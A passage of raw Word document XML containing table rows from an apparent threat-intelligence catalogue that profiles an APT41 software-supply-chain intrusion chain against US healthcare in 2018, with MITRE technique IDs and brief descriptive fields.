      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="13178695" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42279940" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042F135B" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT41</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D063B24" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="60A92BD5" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0892C5F1" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="007328DE" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01C070CB" w14:textId="1C568551" w:rsidR="00D77A9F" w:rsidRPr="007328DE" w:rsidRDefault="000355F3" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000355F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1195.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000355F3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Compromise Software Supply Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB3BEBD" w14:textId="792ED269" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="000355F3" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>From APT41_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="546157C1" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55036CAF" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6D5B66" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="007328DE" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>China</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2158527D" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="2251B10D" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357078DB" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36D9390F" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="466EC393" w14:textId="0862BB3F" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="009BE7E5" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3302009D" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EDE460C" w14:textId="4D0288AE" w:rsidR="00D77A9F" w:rsidRDefault="00577BF6" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Healthcare</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73A5D139" w14:textId="77777777" w:rsidR="00577BF6" w:rsidRPr="00577BF6" w:rsidRDefault="00D77A9F" w:rsidP="00577BF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidR="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00577BF6" w:rsidRPr="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">APT41 activity aimed at medical device companies </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B5862DB" w14:textId="77777777" w:rsidR="00577BF6" w:rsidRPr="00577BF6" w:rsidRDefault="00577BF6" w:rsidP="00577BF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">and pharmaceuticals is demonstrative of the group's </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48D53BCE" w14:textId="77777777" w:rsidR="00577BF6" w:rsidRPr="00577BF6" w:rsidRDefault="00577BF6" w:rsidP="00577BF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">capacity to collect sensitive and highly valuable </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60323158" w14:textId="37643C48" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="00577BF6" w:rsidP="00577BF6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>intellectual property (IP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="04CDE51C" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="781BF762" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31888492" w14:textId="77777777" w:rsidR="00577BF6" w:rsidRDefault="00577BF6" w:rsidP="00577BF6">
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="655952C7" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EC98A5D" w14:textId="533F8463" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r w:rsidR="00577BF6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="6995DB38" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DB160C" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14E9B104" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64389415" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="3568DBA4" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3507DB45" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0973BD70" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38371D39" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="59E880CE" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12BEE471" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="404E8FED" w14:textId="34039E6D" w:rsidR="00D77A9F" w:rsidRDefault="000D2D2A" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT41_001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20F45EE0" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="5867BFCA" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47A238F9" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35709601" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B376D45" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="017AEA4B" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F358C6A" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="645884CA" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2018</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32EB21C2" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="95"/>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="00B857D7" w14:paraId="0C0F1CFD" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="637AF86A" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F98EB0C" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="287E3049" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AD7DFCA" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00AC7A85" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F"/>
    <w:p w14:paraId="06B125F9" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="441"/>
        <w:gridCol w:w="1719"/>
        <w:gridCol w:w="2677"/>
        <w:gridCol w:w="654"/>
        <w:gridCol w:w="671"/>
        <w:gridCol w:w="556"/>
        <w:gridCol w:w="899"/>
        <w:gridCol w:w="2839"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w14:paraId="74149217" w14:textId="77777777" w:rsidTr="00497095">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="550A6FE9" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="96" w:name="OLE_LINK7"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0C742F2A" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="604218DA" w14:textId="394B4AFC" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT41_00</w:t>
            </w:r>
            <w:r w:rsidR="000D2D2A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="654" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="62C03EAE" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0431911A" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
